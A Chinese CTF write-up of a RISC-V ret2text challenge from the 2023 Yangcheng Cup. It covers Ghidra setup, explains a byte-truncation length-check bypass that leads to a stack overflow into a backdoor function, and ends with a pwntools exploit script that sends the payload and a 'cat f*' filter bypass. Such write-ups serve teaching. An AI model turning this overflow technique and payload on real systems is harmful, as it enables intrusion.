【PWN · ret2text | RISC-V异构】[2023 羊城杯]login

第一道异构PWN的题目,没做出来。。。。但是是因为工具没有 QAQ


目录

前言

一、食用工具

Ghidra

安装使用

二、解题思路

三、exp

总结


前言

我们context.arch经常是'i386'和'amd64',突然遇到RISC-V架构的题目,一是本地运行不了(环境没配),二是IDA无法反汇编。苦恼。


一、食用工具

于是找啊找。找到cutter——一款risc-v的反汇编反编译工具,然而太shi了,反编译的c代码看不了一点,全是错的。赛后问了学长,晓得了一般做异构pwn、reverse的工具:

Ghidra

Ghidra 是美国国家安全局(RSA)开源发布的软件逆向工程框架,涵盖了反汇编、反编译等工具。该工具2019年3月开源。与之对标的有windows平台下的IDA Pro和linux平台下的radare2等。

资源直接吾爱破解:Ghidra 10.3 - 『逆向资源区』 - 吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

可以直接通过下载链接(来自上面吾爱破解那篇博客)

ghidra_10.3_PUBLIC_20230510.zip官方版下载丨最新版下载丨绿色版下载丨APP下载-123云盘 

安装使用

1. jdk11+的环境

2. 运行目录下bat文件

3. 创建project后,导入要反汇编的文件即可

【PWN · ret2text | RISC-V异构】[2023 羊城杯]login_第1张图片

二、解题思路

这个过程就比较熟悉了,让我们来读读反汇编后的伪c代码

【PWN · ret2text | RISC-V异构】[2023 羊城杯]login_第2张图片

第一个输入读8字节,第二个读288字节,似乎都没有栈溢出问题,进入FUN_12345786看看

【PWN · ret2text | RISC-V异构】[2023 羊城杯]login_第3张图片

这里有将传入检查的字符串赋值给另一串。源字符串最长为288,目的字符串最长为248,也许可以溢出,然而中间检查了检查字符串(函数参数)的长度<8,这该怎么办呢?

DAT_12347070 = (byte)sVar1 

这里的sVar1是参数字符串的长度,被强制类型转换为byte,而byte是有符号型的,可以表示-128—127 的数。这一点可以和char类比,都是一个字节,但是是有符号的。

如果我们让读入字符串的长度为  256  会发生什么?——发生截断,DAT_12347070 == 0

如果我们让读入字符串的长度为256+8会发生什么?——发生截断,DAT_12347070 == 8

我们惊喜的发现——这两种情况都绕过了”too long"检查。

那让我们再精打细算一下——248字符数组长度+8’所谓的ebp‘长度+8retaddr长度==256+8 

没错,这里的栈溢出点让我们找到了,并且我们可以控制一次跳转地址的自定义——程序中有一个后门函数——刚好跳到这里

【PWN · ret2text | RISC-V异构】[2023 羊城杯]login_第4张图片

过滤了'sh'和'flag’,那我们就 cat f* 绕过即可

三、exp

from pwn import *
from pwn import u64,u32,p64,p32

io=remote(...)

io.sendafter(b'name:\n',b'a'*8)
payload=b'/bin/sh;'*(0x100//8)+p64(0x123456ee)
io.sendafter(b'words\n',payload)
io.sendline(b'cat f*')
io.interactive()

总结

第一道异构PWN

羊城杯对于大佬来说“还挺简单的”,但是对于我们萌新,要哭了(萌新了快一年了进度好慢)

感谢亢学长的帮助!

你可能感兴趣的:(【PWN,·,ret2text】,risc-v,ctf,pwn,栈溢出,ret2text)